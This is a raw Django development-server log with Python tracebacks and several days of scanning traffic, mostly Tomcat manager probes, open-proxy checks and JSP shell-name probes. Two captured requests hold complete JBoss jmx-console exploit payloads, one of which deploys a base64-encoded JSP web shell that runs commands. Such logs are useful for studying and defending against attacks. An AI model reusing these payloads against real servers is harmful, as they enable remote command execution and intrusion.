  File "/usr/lib/python2.7/SocketServer.py", line 593, in process_request_thread
    self.finish_request(request, client_address)
  File "/usr/lib/python2.7/SocketServer.py", line 334, in finish_request
    self.RequestHandlerClass(request, client_address, self)
  File "/usr/lib/python2.7/dist-packages/django/core/servers/basehttp.py", line 126, in __init__
    super(WSGIRequestHandler, self).__init__(*args, **kwargs)
  File "/usr/lib/python2.7/SocketServer.py", line 651, in __init__
    self.finish()
  File "/usr/lib/python2.7/SocketServer.py", line 710, in finish
    self.wfile.close()
  File "/usr/lib/python2.7/socket.py", line 279, in close
    self.flush()
  File "/usr/lib/python2.7/socket.py", line 303, in flush
    self._sock.sendall(view[write_offset:write_offset+buffer_size])
error: [Errno 32] Broken pipe
[06/Feb/2017 09:00:26] "GET / HTTP/1.1" 404 2000
[06/Feb/2017 10:31:29] "GET http://clientapi.ipip.net/echo.php?info=1234567890 HTTP/1.1" 404 1712
[06/Feb/2017 11:45:05] "GET /manager/html HTTP/1.1" 404 2041
[06/Feb/2017 12:21:55] "GET / HTTP/1.1" 404 2004
[06/Feb/2017 13:08:18] "GET / HTTP/1.1" 404 2005
Traceback (most recent call last):
  File "/usr/lib/python2.7/SocketServer.py", line 593, in process_request_thread
    self.finish_request(request, client_address)
  File "/usr/lib/python2.7/SocketServer.py", line 334, in finish_request
    self.RequestHandlerClass(request, client_address, self)
  File "/usr/lib/python2.7/dist-packages/django/core/servers/basehttp.py", line 126, in __init__
    super(WSGIRequestHandler, self).__init__(*args, **kwargs)
  File "/usr/lib/python2.7/SocketServer.py", line 649, in __init__
    self.handle()
  File "/usr/lib/python2.7/wsgiref/simple_server.py", line 116, in handle
    self.raw_requestline = self.rfile.readline()
  File "/usr/lib/python2.7/socket.py", line 447, in readline
    data = self._sock.recv(self._rbufsize)
error: [Errno 104] Connection reset by peer
[06/Feb/2017 17:39:52] "GET /manager/html HTTP/1.1" 404 2041
[06/Feb/2017 20:28:22] "GET http://www.baidu.com/favicon.ico HTTP/1.1" 404 1685
[06/Feb/2017 21:03:06] "GET http://www.qq.com/404/search_children.js HTTP/1.1" 404 1706
[06/Feb/2017 21:03:10] code 400, message Bad request syntax ('\x04\x01\x00PpTi4\x00')
[06/Feb/2017 21:03:10] " PpTi4 " 400 -
[06/Feb/2017 21:03:10] code 400, message Bad request syntax ('\x05\x01\x00')
[06/Feb/2017 21:03:10] " " 400 -
[06/Feb/2017 21:05:21] "GET http://www.baidu.com/favicon.ico HTTP/1.1" 404 1685
[06/Feb/2017 21:11:41] "GET / HTTP/1.1" 404 2000
[06/Feb/2017 21:43:21] "GET / HTTP/1.1" 404 2000
[06/Feb/2017 23:23:47] "GET /manager/html HTTP/1.1" 404 2041
[06/Feb/2017 23:38:51] "GET /manager/html HTTP/1.1" 404 2041
[07/Feb/2017 00:07:00] "GET / HTTP/1.1" 404 2000
[07/Feb/2017 00:12:09] "GET /manager/html HTTP/1.1" 404 2041
[07/Feb/2017 00:38:31] "GET http://www.baidu.com/?rands=_151451188668982804769856 HTTP/1.0" 404 1684
[07/Feb/2017 00:38:31] "GET http://23.251.55.38/index.html?rands=_103003813183325683352960 HTTP/1.0" 404 1710
[07/Feb/2017 01:40:07] "GET http://www.baidu.com/cache/global/img/gs.gif HTTP/1.1" 404 1721
[07/Feb/2017 02:35:56] "GET / HTTP/1.1" 404 2005
[07/Feb/2017 02:36:32] "GET / HTTP/1.1" 404 2005
[07/Feb/2017 02:53:30] "GET http://www.baidu.com/favicon.ico HTTP/1.1" 404 1685
[07/Feb/2017 04:12:16] "GET /manager/html HTTP/1.1" 404 2041
[07/Feb/2017 04:57:15] "GET http://www.baidu.com/ HTTP/1.1" 404 1652
[07/Feb/2017 05:55:14] "GET http://www.baidu.com/cache/global/img/gs.gif HTTP/1.1" 404 1721
[07/Feb/2017 09:33:56] "GET http://www.baidu.com/?rands=_1014629085016375593619560 HTTP/1.0" 404 1685
[07/Feb/2017 09:33:57] "GET http://23.251.55.38/index.html?rands=_63564492813666833509640 HTTP/1.0" 404 1709
[07/Feb/2017 12:24:57] "GET / HTTP/1.1" 404 2003
[07/Feb/2017 13:17:21] "GET / HTTP/1.1" 404 2000
[07/Feb/2017 15:26:10] "GET / HTTP/1.0" 404 2005
[07/Feb/2017 16:07:21] "GET /manager/html HTTP/1.1" 404 2041
[07/Feb/2017 17:03:19] "GET http://testp3.pospr.waw.pl/testproxy.php HTTP/1.1" 404 1715
[07/Feb/2017 17:03:20] "CONNECT www.baidu.com HTTP/1.1" 404 1632
[07/Feb/2017 17:35:26] "GET /manager/html HTTP/1.1" 404 2041
[07/Feb/2017 18:41:06] "GET /robots.txt HTTP/1.1" 404 2036
Traceback (most recent call last):
  File "/usr/lib/python2.7/wsgiref/handlers.py", line 86, in run
    self.finish_response()
  File "/usr/lib/python2.7/wsgiref/handlers.py", line 128, in finish_response
    self.write(data)
  File "/usr/lib/python2.7/wsgiref/handlers.py", line 212, in write
    self.send_headers()
  File "/usr/lib/python2.7/wsgiref/handlers.py", line 270, in send_headers
    self.send_preamble()
  File "/usr/lib/python2.7/wsgiref/handlers.py", line 191, in send_preamble
    self._write('HTTP/%s %s\r\n' % (self.http_version,self.status))
  File "/usr/lib/python2.7/wsgiref/handlers.py", line 391, in _write
    self.stdout.write(data)
  File "/usr/lib/python2.7/socket.py", line 324, in write
    self.flush()
  File "/usr/lib/python2.7/socket.py", line 303, in flush
    self._sock.sendall(view[write_offset:write_offset+buffer_size])
error: [Errno 104] Connection reset by peer
[07/Feb/2017 18:41:06] "GET /robots.txt HTTP/1.1" 500 59
Traceback (most recent call last):
  File "/usr/lib/python2.7/SocketServer.py", line 593, in process_request_thread
    self.finish_request(request, client_address)
  File "/usr/lib/python2.7/SocketServer.py", line 334, in finish_request
    self.RequestHandlerClass(request, client_address, self)
  File "/usr/lib/python2.7/dist-packages/django/core/servers/basehttp.py", line 126, in __init__
    super(WSGIRequestHandler, self).__init__(*args, **kwargs)
  File "/usr/lib/python2.7/SocketServer.py", line 651, in __init__
    self.finish()
  File "/usr/lib/python2.7/SocketServer.py", line 710, in finish
    self.wfile.close()
  File "/usr/lib/python2.7/socket.py", line 279, in close
    self.flush()
  File "/usr/lib/python2.7/socket.py", line 303, in flush
    self._sock.sendall(view[write_offset:write_offset+buffer_size])
error: [Errno 32] Broken pipe
[07/Feb/2017 18:41:10] "GET / HTTP/1.1" 404 2006
Traceback (most recent call last):
  File "/usr/lib/python2.7/wsgiref/handlers.py", line 86, in run
    self.finish_response()
  File "/usr/lib/python2.7/wsgiref/handlers.py", line 128, in finish_response
    self.write(data)
  File "/usr/lib/python2.7/wsgiref/handlers.py", line 212, in write
    self.send_headers()
  File "/usr/lib/python2.7/wsgiref/handlers.py", line 270, in send_headers
    self.send_preamble()
  File "/usr/lib/python2.7/wsgiref/handlers.py", line 191, in send_preamble
    self._write('HTTP/%s %s\r\n' % (self.http_version,self.status))
  File "/usr/lib/python2.7/wsgiref/handlers.py", line 391, in _write
    self.stdout.write(data)
  File "/usr/lib/python2.7/socket.py", line 324, in write
    self.flush()
  File "/usr/lib/python2.7/socket.py", line 303, in flush
    self._sock.sendall(view[write_offset:write_offset+buffer_size])
error: [Errno 104] Connection reset by peer
[07/Feb/2017 18:41:10] "GET / HTTP/1.1" 500 59
Traceback (most recent call last):
  File "/usr/lib/python2.7/SocketServer.py", line 593, in process_request_thread
    self.finish_request(request, client_address)
  File "/usr/lib/python2.7/SocketServer.py", line 334, in finish_request
    self.RequestHandlerClass(request, client_address, self)
  File "/usr/lib/python2.7/dist-packages/django/core/servers/basehttp.py", line 126, in __init__
    super(WSGIRequestHandler, self).__init__(*args, **kwargs)
  File "/usr/lib/python2.7/SocketServer.py", line 651, in __init__
    self.finish()
  File "/usr/lib/python2.7/SocketServer.py", line 710, in finish
    self.wfile.close()
  File "/usr/lib/python2.7/socket.py", line 279, in close
    self.flush()
  File "/usr/lib/python2.7/socket.py", line 303, in flush
    self._sock.sendall(view[write_offset:write_offset+buffer_size])
error: [Errno 32] Broken pipe
[07/Feb/2017 21:42:02] "HEAD /index.php HTTP/1.1" 404 0
[07/Feb/2017 21:42:02] "HEAD /admin/images/tango.png HTTP/1.1" 404 0
[08/Feb/2017 02:19:34] "GET /manager/html HTTP/1.1" 404 2041
[08/Feb/2017 02:22:11] "GET /blog/home/ HTTP/1.1" 200 5202
Traceback (most recent call last):
  File "/usr/lib/python2.7/wsgiref/handlers.py", line 86, in run
    self.finish_response()
  File "/usr/lib/python2.7/wsgiref/handlers.py", line 128, in finish_response
    self.write(data)
  File "/usr/lib/python2.7/wsgiref/handlers.py", line 212, in write
    self.send_headers()
  File "/usr/lib/python2.7/wsgiref/handlers.py", line 270, in send_headers
    self.send_preamble()
  File "/usr/lib/python2.7/wsgiref/handlers.py", line 191, in send_preamble
    self._write('HTTP/%s %s\r\n' % (self.http_version,self.status))
  File "/usr/lib/python2.7/wsgiref/handlers.py", line 391, in _write
    self.stdout.write(data)
  File "/usr/lib/python2.7/socket.py", line 324, in write
    self.flush()
  File "/usr/lib/python2.7/socket.py", line 303, in flush
    self._sock.sendall(view[write_offset:write_offset+buffer_size])
error: [Errno 104] Connection reset by peer
[08/Feb/2017 02:22:11] "GET /blog/home/ HTTP/1.1" 500 59
Traceback (most recent call last):
  File "/usr/lib/python2.7/SocketServer.py", line 593, in process_request_thread
    self.finish_request(request, client_address)
  File "/usr/lib/python2.7/SocketServer.py", line 334, in finish_request
    self.RequestHandlerClass(request, client_address, self)
  File "/usr/lib/python2.7/dist-packages/django/core/servers/basehttp.py", line 126, in __init__
    super(WSGIRequestHandler, self).__init__(*args, **kwargs)
  File "/usr/lib/python2.7/SocketServer.py", line 651, in __init__
    self.finish()
  File "/usr/lib/python2.7/SocketServer.py", line 710, in finish
    self.wfile.close()
  File "/usr/lib/python2.7/socket.py", line 279, in close
    self.flush()
  File "/usr/lib/python2.7/socket.py", line 303, in flush
    self._sock.sendall(view[write_offset:write_offset+buffer_size])
error: [Errno 32] Broken pipe
Traceback (most recent call last):
  File "/usr/lib/python2.7/wsgiref/handlers.py", line 86, in run
    self.finish_response()
  File "/usr/lib/python2.7/wsgiref/handlers.py", line 128, in finish_response
    self.write(data)
  File "/usr/lib/python2.7/wsgiref/handlers.py", line 212, in write
    self.send_headers()
  File "/usr/lib/python2.7/wsgiref/handlers.py", line 270, in send_headers
    self.send_preamble()
  File "/usr/lib/python2.7/wsgiref/handlers.py", line 191, in send_preamble
    self._write('HTTP/%s %s\r\n' % (self.http_version,self.status))
  File "/usr/lib/python2.7/wsgiref/handlers.py", line 391, in _write
    self.stdout.write(data)
  File "/usr/lib/python2.7/socket.py", line 324, in write
    self.flush()
  File "/usr/lib/python2.7/socket.py", line 303, in flush
    self._sock.sendall(view[write_offset:write_offset+buffer_size])
error: [Errno 104] Connection reset by peer
Traceback (most recent call last):
  File "/usr/lib/python2.7/SocketServer.py", line 593, in process_request_thread
    self.finish_request(request, client_address)
  File "/usr/lib/python2.7/SocketServer.py", line 334, in finish_request
    self.RequestHandlerClass(request, client_address, self)
  File "/usr/lib/python2.7/dist-packages/django/core/servers/basehttp.py", line 126, in __init__
    super(WSGIRequestHandler, self).__init__(*args, **kwargs)
  File "/usr/lib/python2.7/SocketServer.py", line 651, in __init__
    self.finish()
  File "/usr/lib/python2.7/SocketServer.py", line 710, in finish
    self.wfile.close()
  File "/usr/lib/python2.7/socket.py", line 279, in close
    self.flush()
  File "/usr/lib/python2.7/socket.py", line 303, in flush
    self._sock.sendall(view[write_offset:write_offset+buffer_size])
error: [Errno 32] Broken pipe
[08/Feb/2017 02:22:19] "GET /blog/home/ HTTP/1.1" 200 5202
[08/Feb/2017 02:54:19] "GET / HTTP/1.1" 404 2005
[08/Feb/2017 05:00:00] "GET http://www.baidu.com/?rands=_49254010982058336184528 HTTP/1.0" 404 1683
[08/Feb/2017 05:00:00] "GET http://23.251.55.38/index.html?rands=_90363186148601121767992 HTTP/1.0" 404 1709
[08/Feb/2017 05:18:35] "GET /manager/html HTTP/1.1" 404 2041
[08/Feb/2017 05:25:35] "GET /computer/ HTTP/1.1" 404 2032
[08/Feb/2017 06:05:58] "GET /manager/html HTTP/1.1" 404 2041
[08/Feb/2017 06:16:23] "GET /manager/html HTTP/1.1" 404 2041
[08/Feb/2017 06:20:31] "GET http://www.baidu.com/favicon.ico HTTP/1.1" 404 1685
[08/Feb/2017 06:45:51] "CONNECT www.baidu.com:443 HTTP/1.1" 404 1644
[08/Feb/2017 08:33:20] "GET /script HTTP/1.1" 404 2023
[08/Feb/2017 08:40:15] "GET /robots.txt HTTP/1.1" 404 2040
[08/Feb/2017 08:40:19] "GET / HTTP/1.1" 404 2010
Traceback (most recent call last):
  File "/usr/lib/python2.7/wsgiref/handlers.py", line 86, in run
    self.finish_response()
  File "/usr/lib/python2.7/wsgiref/handlers.py", line 128, in finish_response
    self.write(data)
  File "/usr/lib/python2.7/wsgiref/handlers.py", line 212, in write
    self.send_headers()
  File "/usr/lib/python2.7/wsgiref/handlers.py", line 270, in send_headers
    self.send_preamble()
  File "/usr/lib/python2.7/wsgiref/handlers.py", line 191, in send_preamble
    self._write('HTTP/%s %s\r\n' % (self.http_version,self.status))
  File "/usr/lib/python2.7/wsgiref/handlers.py", line 391, in _write
    self.stdout.write(data)
  File "/usr/lib/python2.7/socket.py", line 324, in write
    self.flush()
  File "/usr/lib/python2.7/socket.py", line 303, in flush
    self._sock.sendall(view[write_offset:write_offset+buffer_size])
error: [Errno 104] Connection reset by peer
[08/Feb/2017 08:40:19] "GET / HTTP/1.1" 500 59
Traceback (most recent call last):
  File "/usr/lib/python2.7/SocketServer.py", line 593, in process_request_thread
    self.finish_request(request, client_address)
  File "/usr/lib/python2.7/SocketServer.py", line 334, in finish_request
    self.RequestHandlerClass(request, client_address, self)
  File "/usr/lib/python2.7/dist-packages/django/core/servers/basehttp.py", line 126, in __init__
    super(WSGIRequestHandler, self).__init__(*args, **kwargs)
  File "/usr/lib/python2.7/SocketServer.py", line 651, in __init__
    self.finish()
  File "/usr/lib/python2.7/SocketServer.py", line 710, in finish
    self.wfile.close()
  File "/usr/lib/python2.7/socket.py", line 279, in close
    self.flush()
  File "/usr/lib/python2.7/socket.py", line 303, in flush
    self._sock.sendall(view[write_offset:write_offset+buffer_size])
error: [Errno 32] Broken pipe
Traceback (most recent call last):
  File "/usr/lib/python2.7/SocketServer.py", line 593, in process_request_thread
    self.finish_request(request, client_address)
  File "/usr/lib/python2.7/SocketServer.py", line 334, in finish_request
    self.RequestHandlerClass(request, client_address, self)
  File "/usr/lib/python2.7/dist-packages/django/core/servers/basehttp.py", line 126, in __init__
    super(WSGIRequestHandler, self).__init__(*args, **kwargs)
  File "/usr/lib/python2.7/SocketServer.py", line 649, in __init__
    self.handle()
  File "/usr/lib/python2.7/wsgiref/simple_server.py", line 116, in handle
    self.raw_requestline = self.rfile.readline()
  File "/usr/lib/python2.7/socket.py", line 447, in readline
    data = self._sock.recv(self._rbufsize)
error: [Errno 104] Connection reset by peer
[08/Feb/2017 09:41:47] "GET /script HTTP/1.1" 404 2023
[08/Feb/2017 10:16:26] "GET http://www.baidu.com/cache/global/img/gs.gif HTTP/1.1" 404 1721
[08/Feb/2017 10:58:07] "GET /script HTTP/1.1" 404 2023
[08/Feb/2017 11:25:18] "GET http://clientapi.ipip.net/echo.php?info=1234567890 HTTP/1.1" 404 1712
[08/Feb/2017 13:44:53] "GET http://www.baidu.com/cache/global/img/gs.gif HTTP/1.1" 404 1721
Traceback (most recent call last):
  File "/usr/lib/python2.7/SocketServer.py", line 593, in process_request_thread
    self.finish_request(request, client_address)
  File "/usr/lib/python2.7/SocketServer.py", line 334, in finish_request
    self.RequestHandlerClass(request, client_address, self)
  File "/usr/lib/python2.7/dist-packages/django/core/servers/basehttp.py", line 126, in __init__
    super(WSGIRequestHandler, self).__init__(*args, **kwargs)
  File "/usr/lib/python2.7/SocketServer.py", line 649, in __init__
    self.handle()
  File "/usr/lib/python2.7/wsgiref/simple_server.py", line 116, in handle
    self.raw_requestline = self.rfile.readline()
  File "/usr/lib/python2.7/socket.py", line 447, in readline
    data = self._sock.recv(self._rbufsize)
error: [Errno 104] Connection reset by peer
[08/Feb/2017 13:49:25] "GET / HTTP/1.0" 404 2001
[08/Feb/2017 13:49:36] code 400, message Bad request version ('\x00')
Traceback (most recent call last):
  File "/usr/lib/python2.7/SocketServer.py", line 593, in process_request_thread
    self.finish_request(request, client_address)
  File "/usr/lib/python2.7/SocketServer.py", line 334, in finish_request
    self.RequestHandlerClass(request, client_address, self)
  File "/usr/lib/python2.7/dist-packages/django/core/servers/basehttp.py", line 126, in __init__
    super(WSGIRequestHandler, self).__init__(*args, **kwargs)
  File "/usr/lib/python2.7/SocketServer.py", line 649, in __init__
    self.handle()
  File "/usr/lib/python2.7/wsgiref/simple_server.py", line 117, in handle
    if not self.parse_request(): # An error code has been sent, just exit
  File "/usr/lib/python2.7/BaseHTTPServer.py", line 253, in parse_request
    self.send_error(400, "Bad request version (%r)" % version)
  File "/usr/lib/python2.7/BaseHTTPServer.py", line 368, in send_error
    self.send_response(code, message)
  File "/usr/lib/python2.7/BaseHTTPServer.py", line 385, in send_response
    self.log_request(code)
  File "/usr/lib/python2.7/BaseHTTPServer.py", line 422, in log_request
    self.requestline, str(code), str(size))
  File "/usr/lib/python2.7/dist-packages/django/core/servers/basehttp.py", line 138, in log_message
    msg = "[%s] %s\n" % (self.log_date_time_string(), format % args)
UnicodeDecodeError: 'ascii' codec can't decode byte 0x9b in position 13: ordinal not in range(128)
[08/Feb/2017 13:50:08] "GET /axis2-admin/login HTTP/1.1" 404 2056
[08/Feb/2017 13:50:17] "HEAD //jmx-console/HtmlAdaptor?action=invokeOpByName&name=jboss.deployer:service=BSHDeployer&methodName=createScriptDeployment&argType=java.lang.String&arg0=%0Aimport%20java.io.FileOutputStream%3B%0Aimport%20sun.misc.BASE64Decoder%3B%0A%0AString%20val%20%3D%20%22CjwlQApwYWdlIGltcG9ydD0iamF2YS51dGlsLiosIGphdmEuaW8uKiIKJT4KPCUKaWYgKHJlcXVlc3QuZ2V0UGFyYW1ldGVyKCJjbWQiKSAhPSBudWxsKQp7CiAgICBQcm9jZXNzIHAgPSBSdW50aW1lLmdldFJ1bnRpbWUoKS5leGVjKHJlcXVlc3QuZ2V0UGFyYW1ldGVyKCJjbWQiKSk7CiAgICBPdXRwdXRTdHJlYW0gb3MgPSBwLmdldE91dHB1dFN0cmVhbSgpOwogICAgSW5wdXRTdHJlYW0gaW4gPSBwLmdldElucHV0U3RyZWFtKCk7CiAgICBEYXRhSW5wdXRTdHJlYW0gZGlzID0gbmV3IERhdGFJbnB1dFN0cmVhbShpbik7CiAgICBTdHJpbmcgZGlzciA9IGRpcy5yZWFkTGluZSgpOwogICAgd2hpbGUgKCBkaXNyICE9IG51bGwpCiAgICB7CiAgICAgICAgb3V0LnByaW50bG4oZGlzciArICI8YnI%2BIik7CiAgICAgICAgZGlzciA9IGRpcy5yZWFkTGluZSgpOwogICAgfQp9CgoKaWYgKHJlcXVlc3QuZ2V0UGFyYW1ldGVyKCJkZWwiKSAhPSBudWxsKSB7CglTdHJpbmcgY29udGV4dFBhdGggPSByZXF1ZXN0LmdldFJlYWxQYXRoKCJiYXB0dWdydi5qc3AiKTsKICAgICAgIEZpbGUganNwRmlsZSA9IG5ldyBGaWxlKGNvbnRleHRQYXRoKTsKCWlmIChqc3BGaWxlLmV4aXN0cygpKSB7CgkJYm9vbGVhbiBkZWxSZXN1bHQgPSBqc3BGaWxlLmRlbGV0ZSgpOwoJfQoKfQoKJT48JSBvdXQucHJpbnRsbigieWprIisiaXRncG4iKTslPg%3D%3D%22%3B%0A%0ABASE64Decoder%20decoder%20%3D%20new%20BASE64Decoder%28%29%3B%0AString%20jboss_home%20%3D%20System.getProperty%28%22jboss.server.home.dir%22%29%3B%0Anew%20File%28jboss_home%20%2B%20%22/deploy/pgoybusk.war%22%29.mkdir%28%29%3B%0Abyte%5B%5D%20byteval%20%3D%20decoder.decodeBuffer%28val%29%3B%0AString%20jsp_file%20%3D%20jboss_home%20%2B%20%22/deploy/pgoybusk.war/baptugrv.jsp%22%3B%0AFileOutputStream%20fstream%20%3D%20new%20FileOutputStream%28jsp_file%29%3B%0Afstream.write%28byteval%29%3B%0Afstream.close%28%29%3B%0A&argType=java.lang.String&arg1=gptnqxjm.bsh HTTP/1.1" 404 0
[08/Feb/2017 13:50:18] "GET /axis2/axis2-admin/login HTTP/1.1" 404 2074
[08/Feb/2017 13:50:23] "GET //pgoybusk/baptugrv.jsp HTTP/1.1" 404 2070
[08/Feb/2017 13:50:50] "GET /solr/admin/file?file=solrconfig.xml HTTP/1.1" 404 2070
[08/Feb/2017 13:50:57] "POST /jmx-console/HtmlAdaptor HTTP/1.1" 404 2075
[08/Feb/2017 13:50:57] "HEAD /jmx-console/HtmlAdaptor?action=invokeOp&name=jboss.admin%3Aservice%3DDeploymentFileRepository&methodIndex=5&arg0=test.war&arg1=test&arg2=.jsp&arg3=%0A%3C%25%40%20page%20import%3D%22java.util.%2A%2Cjava.io.%2A%22%20%25%3E%0A%3C%25%40%20page%20import%3D%22java.io.%2A%22%25%3E%0A%3C%25%0AString%20path%3Drequest.getRealPath%28%22%22%29%3B%0Aout.println%28path%29%3B%0AFile%20d%3Dnew%20File%28path%29%3B%0Aif%28d.exists%28%29%29%7B%0A%20%20d.delete%28%29%3B%0A%20%20%7D%0A%25%3E%0A%3C%25%20out.println%28%22this_is_not_exist_9.1314923%22%29%3B%25%3E&arg4=True HTTP/1.1" 404 0
[08/Feb/2017 13:53:08] "GET /test/test.jsp HTTP/1.1" 404 2044
[08/Feb/2017 13:53:08] "HEAD /jmx-console/HtmlAdaptor?action=invokeOp&name=jboss.admin%253Aservice%253DDeploymentFileRepository&methodIndex=4&arg0=test.war&arg1=test&arg2=.jsp HTTP/1.1" 404 0
[08/Feb/2017 13:53:09] "GET /kingdee/login/loginpage.jsp HTTP/1.1" 404 2086
[08/Feb/2017 13:53:10] "POST /invoker/JMXInvokerServlet HTTP/1.1" 404 2081
[08/Feb/2017 13:53:11] "GET /manager/html HTTP/1.1" 404 2041
[08/Feb/2017 13:53:15] "GET /cjhdglqv/kmsjnoyu.jsp HTTP/1.1" 404 2068
[08/Feb/2017 15:15:44] "GET http://www.baidu.com/?rands=_19134151458034114955614440 HTTP/1.0" 404 1686
[08/Feb/2017 15:15:45] "GET http://23.251.55.38/index.html?rands=_13536107891219445586181312 HTTP/1.0" 404 1712
[08/Feb/2017 15:39:25] "GET /manager/html HTTP/1.1" 404 2041
[08/Feb/2017 16:21:51] "GET /index.php HTTP/1.1" 404 2032
[08/Feb/2017 17:00:51] "GET /manager/html HTTP/1.1" 404 2041
[08/Feb/2017 17:34:59] "GET /zecmd/zecmd.jsp HTTP/1.0" 404 2050
[08/Feb/2017 17:34:59] "GET /jexws3/jexws3.jsp HTTP/1.0" 404 2056
[08/Feb/2017 17:34:59] "GET /jexinv3/jexinv3.jsp HTTP/1.0" 404 2062
[08/Feb/2017 17:35:00] "GET /jbossass/jbossass.jsp HTTP/1.0" 404 2068
[08/Feb/2017 17:35:00] "GET /jexws4/jexws4.jsp HTTP/1.0" 404 2056
[08/Feb/2017 17:35:00] "GET /iddqd/iddqd.jsp HTTP/1.0" 404 2050
[08/Feb/2017 17:35:00] "GET /iesvc/iesvc.jsp HTTP/1.0" 404 2050
[08/Feb/2017 17:44:55] "HEAD http://180.163.113.82/check_proxy HTTP/1.1" 404 0
[08/Feb/2017 19:08:35] "GET http://testp3.pospr.waw.pl/testproxy.php HTTP/1.1" 404 1715
[08/Feb/2017 21:24:58] "GET /script HTTP/1.1" 404 2023
[08/Feb/2017 22:33:18] "GET /manager/html HTTP/1.1" 404 2041
[08/Feb/2017 23:01:18] "GET /script HTTP/1.1" 404 2023
[09/Feb/2017 01:34:37] code 400, message Bad request syntax ('\x04\x01\x00P\xb4\xa3qR\x00')
Traceback (most recent call last):
  File "/usr/lib/python2.7/SocketServer.py", line 593, in process_request_thread
    self.finish_request(request, client_address)
  File "/usr/lib/python2.7/SocketServer.py", line 334, in finish_request
    self.RequestHandlerClass(request, client_address, self)
  File "/usr/lib/python2.7/dist-packages/django/core/servers/basehttp.py", line 126, in __init__
    super(WSGIRequestHandler, self).__init__(*args, **kwargs)
  File "/usr/lib/python2.7/SocketServer.py", line 649, in __init__
    self.handle()
  File "/usr/lib/python2.7/wsgiref/simple_server.py", line 117, in handle
    if not self.parse_request(): # An error code has been sent, just exit
  File "/usr/lib/python2.7/BaseHTTPServer.py", line 286, in parse_request
    self.send_error(400, "Bad request syntax (%r)" % requestline)
  File "/usr/lib/python2.7/BaseHTTPServer.py", line 368, in send_error
    self.send_response(code, message)
  File "/usr/lib/python2.7/BaseHTTPServer.py", line 385, in send_response
    self.log_request(code)
  File "/usr/lib/python2.7/BaseHTTPServer.py", line 422, in log_request
    self.requestline, str(code), str(size))
  File "/usr/lib/python2.7/dist-packages/django/core/servers/basehttp.py", line 138, in log_message
    msg = "[%s] %s\n" % (self.log_date_time_string(), format % args)
UnicodeDecodeError: 'ascii' codec can't decode byte 0xb4 in position 5: ordinal not in range(128)
[09/Feb/2017 01:46:48] "GET http://www.baidu.com/?rands=_2207134016036445505182072 HTTP/1.0" 404 1685
[09/Feb/2017 01:46:48] "GET http://23.251.55.38/index.html?rands=_12082182600425151675879912 HTTP/1.0" 404 1712
[09/Feb/2017 02:05:57] code 400, message Bad request syntax ('\x05\x02\x00\x02')
[09/Feb/2017 02:05:57] " " 400 -
[09/Feb/2017 04:33:04] "GET /robots.txt HTTP/1.1" 404 2036
[09/Feb/2017 04:33:08] "GET / HTTP/1.1" 404 2006
[09/Feb/2017 05:36:41] "GET http://www.google.com/ HTTP/1.1" 404 1656
Traceback (most recent call last):
  File "/usr/lib/python2.7/wsgiref/handlers.py", line 86, in run
    self.finish_response()
  File "/usr/lib/python2.7/wsgiref/handlers.py", line 128, in finish_response
    self.write(data)
  File "/usr/lib/python2.7/wsgiref/handlers.py", line 212, in write
    self.send_headers()
  File "/usr/lib/python2.7/wsgiref/handlers.py", line 270, in send_headers
    self.send_preamble()
  File "/usr/lib/python2.7/wsgiref/handlers.py", line 191, in send_preamble
    self._write('HTTP/%s %s\r\n' % (self.http_version,self.status))
  File "/usr/lib/python2.7/wsgiref/handlers.py", line 391, in _write
    self.stdout.write(data)
  File "/usr/lib/python2.7/socket.py", line 324, in write
    self.flush()
  File "/usr/lib/python2.7/socket.py", line 303, in flush
    self._sock.sendall(view[write_offset:write_offset+buffer_size])
error: [Errno 104] Connection reset by peer
[09/Feb/2017 05:36:41] "GET http://www.google.com/ HTTP/1.1" 500 59
Traceback (most recent call last):
  File "/usr/lib/python2.7/SocketServer.py", line 593, in process_request_thread
    self.finish_request(request, client_address)
  File "/usr/lib/python2.7/SocketServer.py", line 334, in finish_request
    self.RequestHandlerClass(request, client_address, self)
  File "/usr/lib/python2.7/dist-packages/django/core/servers/basehttp.py", line 126, in __init__
    super(WSGIRequestHandler, self).__init__(*args, **kwargs)
  File "/usr/lib/python2.7/SocketServer.py", line 651, in __init__
    self.finish()
  File "/usr/lib/python2.7/SocketServer.py", line 710, in finish
    self.wfile.close()
  File "/usr/lib/python2.7/socket.py", line 279, in close
    self.flush()
  File "/usr/lib/python2.7/socket.py", line 303, in flush
    self._sock.sendall(view[write_offset:write_offset+buffer_size])
error: [Errno 32] Broken pipe
[09/Feb/2017 05:59:55] "GET http://www.baidu.com/favicon.ico HTTP/1.1" 404 1685
[09/Feb/2017 07:02:32] "GET /manager/html HTTP/1.1" 404 2041
[09/Feb/2017 11:26:55] "GET http://www.baidu.com/?rands=_1857057466847458323661320 HTTP/1.0" 404 1685
[09/Feb/2017 11:26:55] "GET http://23.251.55.38/index.html?rands=_571212561610187103999424 HTTP/1.0" 404 1710
[09/Feb/2017 11:27:04] "GET http://clientapi.ipip.net/echo.php?info=1234567890 HTTP/1.1" 404 1712
[09/Feb/2017 13:18:07] "GET /manager/html HTTP/1.1" 404 2041
[09/Feb/2017 16:16:37] "GET /index.php HTTP/1.1" 404 2032
[09/Feb/2017 16:42:44] "GET http://www.baidu.com/cache/global/img/gs.gif HTTP/1.1" 404 1721
[09/Feb/2017 16:44:59] "GET /manager/html HTTP/1.1" 404 2041
[09/Feb/2017 17:38:03] "GET / HTTP/1.1" 404 2005
[09/Feb/2017 18:08:12] "GET / HTTP/1.1" 404 2000
[09/Feb/2017 18:56:42] "GET /script HTTP/1.1" 404 2023
[09/Feb/2017 20:38:05] "GET http://testp4.pospr.waw.pl/testproxy.php HTTP/1.1" 404 1715
[09/Feb/2017 21:18:36] "GET http://www.qq.com/404/search_children.js HTTP/1.1" 404 1706
[09/Feb/2017 21:18:41] code 400, message Bad request syntax ('\x04\x01\x00PpTi4\x00')
[09/Feb/2017 21:18:41] " PpTi4 " 400 -
[09/Feb/2017 21:18:41] code 400, message Bad request syntax ('\x05\x01\x00')
[09/Feb/2017 21:18:41] " " 400 -
[09/Feb/2017 21:26:17] "GET /robots.txt HTTP/1.1" 404 2040
Traceback (most recent call last):
  File "/usr/lib/python2.7/wsgiref/handlers.py", line 86, in run
    self.finish_response()
  File "/usr/lib/python2.7/wsgiref/handlers.py", line 128, in finish_response
    self.write(data)
  File "/usr/lib/python2.7/wsgiref/handlers.py", line 212, in write
    self.send_headers()
  File "/usr/lib/python2.7/wsgiref/handlers.py", line 270, in send_headers
    self.send_preamble()
  File "/usr/lib/python2.7/wsgiref/handlers.py", line 191, in send_preamble
    self._write('HTTP/%s %s\r\n' % (self.http_version,self.status))
  File "/usr/lib/python2.7/wsgiref/handlers.py", line 391, in _write
